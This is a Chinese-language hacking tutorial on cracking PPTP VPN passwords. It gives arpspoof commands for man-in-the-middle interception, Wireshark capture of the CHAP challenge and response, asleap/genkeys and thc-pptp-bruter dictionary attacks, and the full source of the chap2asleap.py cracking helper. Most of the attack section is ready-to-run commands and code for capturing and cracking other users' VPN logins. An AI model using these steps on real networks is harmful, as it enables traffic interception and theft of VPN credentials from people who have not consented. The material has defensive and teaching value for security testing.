破解PPTP加密类型的VPN

PPTP(Point to Point Tunneling Protocol),即点对点隧道协议。该协议是在PPP协议的基础上开发的一种新的增强型安全协议,支持多协议虚拟专用网(VPN),可以通过密码验证协议(PAP)、可扩展认证协议(EAP)等方法增强安全性。可以使远程用户通过拨入ISP、通过直接连接Internet或其他网络安全地访问企业网。

1.asleap+genkeys

使用的软件是 ‘asleap+genkeys’ 套装;这两软件看参数感觉很简单的样子,其实际使用会让人郁闷不已:

过程是:首先抓到含有用户名和密码的 **.pcap 文件包,然后用 genkeys 生成 asleap 专用的字典,再用 asleap 破解这个抓到的包就ok啦!

genkeys -r wordlist.lst -f wordlist.dat -n wordlist.idx

asleap -r **.pcap -f wordlist.dat -n wordlist.idx

可实际本吊在使用的过程中asleap一直报错:

14293334523725

最后发现国外有大牛写了一个脚本用,’chap2asleap.py’ ,转了过来,照着原文折腾下(原文地址:http://blog.g0tmi1k.com/2010/03/chap2asleappy-v011-vpn/)!

首先本机对目标主机开始arp欺骗:

arpspoof -i interface -t x.x.x.x y.y.y.y

arpspoof -i interface -t y.y.y.y x.x.x.x

1429333499688

接下来开始用wireshark抓包 (ps:发现网上“很久”以前的文章关于pptp抓包工具都是 anger 和 pptp-sniff ,最近找了半天也没有找到资源,不知为什么)

wireshark -i interface -k

14293335297348

目标主机登录vpn,让 wireshark 抓到包,用 ‘chap’ 过滤下,这时我们已经可以看到明文的用户名了,然后分别复制 Challenge 和 Response 的 value 值:

14293335633111429333599411014293336593734

使用 ‘chap2asleap.py’ 破解密码:

python chap2asleap.py -C Challenge_value -R Response_value -x -v -d /path/to/wordlist.lst -p /path/to/asleap

-d  #自定义字典文件,默认 /pentest/passwords/wordlists/darkc0de.lst

-p  #指定asleap所在的文件夹,默认 /usr/bin/

如下图,破解一个自己测试密码报错,破解视频里的则能成功,估计win下的加密协议加强了吧

14293336901065

2.thc-pptp-bruter

接上面,wireshark探测到目标连接vpn的用户名和服务器地址之后:

thc-pptp-bruter -u username vpn服务器ip < 字典文件

cat 字典文件 | thc-pptp-bruter -u username vpn服务器ip

可选参数:

-n

-l

chap2asleap.py 脚本源码:

#!/usr/bin/python

#———————————————————————————————-#

#chap2asleap.py v0.2 (#3 2011-04-05)                                                           #

# (C)opyright 2011 – g0tmi1k                                                                   #

#—Important———————————————————————————-#

#                     *** Do NOT use this for illegal or malicious use ***                     #

#                By running this, YOU are using this program at YOUR OWN RISK.                 #

#            This software is provided “as is”, WITHOUT ANY guarantees OR warranty.            #

#—Modules————————————————————————————#

import os, re, sys, hashlib, getopt, binascii, urllib2

#—Defaults———————————————————————————–#

# [/path/to/the/file] Use which file

wordlistPath = “/pentest/passwords/wordlists/darkc0de.lst”

# [/path/to/the/folder] Where is asleap?

asleapPath = “/pentest/wireless/asleap”

# [True/False] Shows more info

verbose = False

# [True/False] Runs asleap afterwords

run = False

# [True/False] Use the wordlist for the attack

wordlist = False

#—Variables———————————————————————————-#

version = “0.2 #3″

txtUser = “” # null the value

txtChal = “” # null the value

txtResp = “” # null the value

action = “33[32m[>]33[0m ”

info = “33[33m[i]33[0m ”

diag = “33[34m[+]33[0m ”

error = “33[31m[!]33[0m ”

#—-Functions———————————————————————————#

def SplitList( list, chunk_size ):

return “”.join([list[offs:offs+chunk_size] + “:” for offs in range(0, len(list), chunk_size)])

#———————————————————————————————-#

def help_message():

print “””(C)opyright 2011 g0tmi1k ~ http://g0tmi1k.blogspot.com

Usage: python chap2asleap.py [options]

Options:

-u username…            — Username

-c 0123456789ABCDEF…    — PPP CHAP Challenge (32 characters)

-r 0123456789ABCDEF…    — PPP CHAP Response  (98 characters)

-x                        — Runs asleap afterwards

-w                        — Uses “Wordlist” for the attack, instead of “genkey” (Default is genkey)

-p /path/to/asleap        — Example: “”” + asleapPath + “””

-d /path/to/wordlist.lst  — Example: “”” + wordlistPath + “””

-h                        — Displays this help message

-v                        — Verbosity mode (shows more detail)

–update                  — Downloads the latest version

Example:

python chap2asleap.py -u scott -c e3a5d0775370bda51e16219a06b0278f -r 84c4b33e00d9231645598acf91c384800000000000000000565fe2492fd5fb88edaec934c00d282c046227406c31609b00 -x -v

Extra Help:

Authors Page: http://www.willhackforsushi.com/Asleap.html

Blog Post: http://g0tmi1k.blogspot.com/2010/03/script-chap2asleappy.html

Video: http://g0tmi1k.blogspot.com/2010/03/video-cracking-vpn-asleap-thc-pptp.html”””

sys.exit(0)

#———————————————————————————————-#

def updateScript():

try:

rScript = urllib2.urlopen(“http://g0tmi1k.googlecode.com/svn/trunk/chap2asleap/chap2asleap.py”).read()

except:

print error + “Error: Couldn’t connect to server”

print error + “Update Failed”

sys.exit(1)

rVersion = re.findall(“version = \”\d.+\d.+\d.”, rScript.lower())

if rVersion: rVersion = rVersion[0].replace(“version = “,””).replace(“\””,””)

else:

print error + “Couldn’t detect version. Please manually update”

print error + “Update Failed”

sys.exit(1)

if version == rVersion:

print action + “Up-to-date”

else:

print action + “Updating…”

updateFile = open(“chap2asleap.py”, “w”)

updateFile.write(rScript)

updateFile.close()

print action + “Update complete”

sys.exit(1)

#—Main—————————————————————————————#

print “33[36m[*]33[0m chap2asleap v” + version + ” ~ Asleap Argument Generator”

#———————————————————————————————-#

try:

opts, args = getopt.getopt(sys.argv[1:], “u:c:r:vxwp:d:h?”, [“user=”,”challenge=”,”response=”,”path=”,”wordlist=”,”help”, “update”])

except getopt.GetoptError, err:   # print help information and exit

print str(err)   # will print something like “option -a not recognized”

sys.exit(0)

#if len(opts) == 0:

#    help_message()

for o, a in opts:

if o in (“-u”, “–user”):

txtUser = a

if o in (“-c”, “–challenge”):

txtChal = a

if o in (“-r”, “–response”):

txtResp = a

if o == “-v”:

verbose = True

if o == “-x”:

run = True

if o == “-w”:

wordlist = True

if o in (“-p”, “–path”):

asleapPath = a

if o in (“-d”, “–wordlist”):

wordlistPath = a

if o in (“-h”, “–help”, “-?”):

help_message()

if o  == “–update”:

updateScript()

#———————————————————————————————-#

mainLoop = True

try:

while mainLoop:

if txtUser == “”: txtUser = raw_input(“[~] Please enter the username: “)

else: mainLoop = False

mainLoop = True

while mainLoop:

if txtChal == “”: txtChal = raw_input(“[~] Please enter the PPP CHAP Challenge: “)

txtChal = txtChal.replace(“:”, “”)

if not re.search(“[0-f]”, txtChal):

txtChal = “”

print error+”Sorry, you can’t input that for the CHAP Challenge. Only 0-9 a-f.”

elif len(txtChal) != 32:

txtChal = “”

print error+”Sorry, PPP CHAP Challenge has to be 32 bytes in length.”

else:

mainLoop = False

mainLoop = True

while mainLoop:

if txtResp == “”: txtResp = raw_input(“[~] Please enter the PPP CHAP Response: “)

txtResp = txtResp.replace(“:”, “”)

if not re.search(“[0-f]”, txtResp):

print error+”Sorry, you can’t input that for the CHAP Response. Only 0-9 a-f.”

txtResp = “”

elif len(txtResp) != 98:

print error+”Sorry, PPP CHAP Response has to be 32 bytes in length.”

txtResp = “”

else:

mainLoop = False

if asleapPath[-1:] == “/”: asleapPath = asleapPath[0:-1]

#———————————————————————————————-#

if verbose == True: print info + ”      Username: ” + txtUser

if verbose == True: print info + “CHAP Challenge: ” + txtChal

if verbose == True: print info + ” CHAP Response: ” + txtResp

#———————————————————————————————-#

authChallenge = binascii.unhexlify(txtChal)

peerChallenge = binascii.unhexlify((txtResp)[0:32])

response = txtResp[48:96]

challenge = ((hashlib.sha1( peerChallenge + authChallenge + txtUser )).hexdigest())[0:16]

if verbose == True: print info + “Auth Challenge: ” + txtChal

if verbose == True: print info + “Peer Challenge: ” + (txtResp)[0:32]

if verbose == True: print info + ” Peer Response: ” + response

if verbose == True: print info + ”     Challenge: ” + challenge

challenge = (SplitList (challenge,2 ))[0:-1]

response  = (SplitList (response,2 ))[0:-1]

#———————————————————————————————-#

print action+”Result:”

print “cd ” + asleapPath

if wordlist == False:

print “./genkey -r ” + wordlistPath + ” -f words.dat -n words.idx”

print “./asleap -C ” + challenge + ” -R ” + response + ” -f words.dat -n words.idx”

else:

print “./asleap -C ” + challenge + ” -R ” + response + ” -W ” + wordlistPath

#———————————————————————————————-#

if (os.path.isfile(asleapPath + “/genkeys”) and run == True):

if wordlist == False:

os.system (asleapPath + “/genkeys -r ” + wordlistPath + ” -f /tmp/words.dat -n /tmp/words.idx”)

os.system (asleapPath + “/asleap -C ” + challenge + ” -R ” + response + ” -f /tmp/words.dat -n /tmp/words.idx”)

os.remove (“/tmp/words.dat”)

os.remove (“/tmp/words.idx”)

if wordlist == True:

os.system (asleapPath + “/asleap -C ” + challenge + ” -R ” + response + ” -W ” + wordlistPath)

elif run == True:

print “alseap isn’t located: ” + asleapPath

#———————————————————————————————-#

print “33[36m[*]33[0m Done! =)”

#———————————————————————————————-#

except KeyboardInterrupt:

print “”

sys.exit(0)

文章来源:FreeBuf黑客与极客(FreeBuf.com)

发表评论

邮箱地址不会被公开。 必填项已用*标注